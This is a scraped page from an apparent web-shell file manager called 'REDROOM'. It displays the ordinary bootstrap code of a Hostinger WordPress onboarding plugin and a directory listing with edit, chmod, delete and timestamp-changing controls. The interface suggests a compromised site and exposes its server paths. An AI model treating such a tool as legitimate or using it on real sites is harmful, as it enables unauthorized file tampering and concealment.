REDROOM
PHP 8.0.30
Path:
Logout
Edit File
Size: 1.88 KB
Close
//home/certprox/template.certproxywizard.com/wp-content/plugins/hostinger-easy-onboarding/loader.php
Text
Base64
<?php use Hostinger\EasyOnboarding\EasyOnboarding; use Hostinger\EasyOnboarding\Activator; use Hostinger\EasyOnboarding\Deactivator; use Hostinger\WpMenuManager\Manager; use Hostinger\Surveys\Loader; use Hostinger\Amplitude\AmplitudeLoader; $vendor_file = __DIR__ . DIRECTORY_SEPARATOR . 'vendor' . DIRECTORY_SEPARATOR . 'autoload_packages.php'; if ( file_exists( $vendor_file ) ) { require_once $vendor_file; } else { return; } /** * Plugin activation hook. */ function hostinger_easy_onboarding_activate(): void { Activator::activate(); } /** * Plugin deactivation hook. */ function hostinger_easy_onboarding_deactivate(): void { Deactivator::deactivate(); } if ( ! function_exists( 'hostinger_load_menus' ) ) { function hostinger_load_menus(): void { $manager = Manager::getInstance(); $manager->boot(); } } if ( ! function_exists( 'hostinger_add_surveys' ) ) { function hostinger_add_surveys(): void { $surveys = Loader::getInstance(); $surveys->boot(); } } if ( ! function_exists( 'hostinger_load_amplitude' ) ) { function hostinger_load_amplitude(): void { $amplitude = AmplitudeLoader::getInstance(); $amplitude->boot(); } } if ( ! has_action( 'plugins_loaded', 'hostinger_load_menus' ) ) { add_action( 'plugins_loaded', 'hostinger_load_menus' ); } if ( ! has_action( 'plugins_loaded', 'hostinger_add_surveys' ) ) { add_action( 'plugins_loaded', 'hostinger_add_surveys' ); } if ( ! has_action( 'plugins_loaded', 'hostinger_load_amplitude' ) ) { add_action( 'plugins_loaded', 'hostinger_load_amplitude' ); } register_activation_hook( HOSTINGER_EASY_ONBOARDING_PLUGIN_FILE, 'hostinger_easy_onboarding_activate' ); register_deactivation_hook( HOSTINGER_EASY_ONBOARDING_PLUGIN_FILE, 'hostinger_easy_onboarding_deactivate' ); $hostinger_easy_onboarding = new EasyOnboarding(); $hostinger_easy_onboarding->run();
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 5 × Files: 5
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
assets
DIR
-
drwxr-xr-x
2026-06-14 00:11:45
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
gutenberg
DIR
-
drwxr-xr-x
2026-06-14 00:11:32
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
includes
DIR
-
drwxr-xr-x
2026-06-14 00:11:45
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
languages
DIR
-
drwxr-xr-x
2026-06-14 00:11:32
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
vendor
DIR
-
drwxr-xr-x
2026-06-14 00:11:28
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
hostinger-easy-onboarding.php
3.69 KB
lrw-r--r--
2026-06-10 16:30:23
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
index.php
33 B
lrw-r--r--
2026-06-10 16:30:23
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
loader.php
1.88 KB
lrw-r--r--
2026-06-10 16:30:23
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
readme.txt
20.61 KB
lrw-r--r--
2026-06-10 16:30:23
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
uninstall.php
49 B
lrw-r--r--
2026-06-10 16:30:23
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).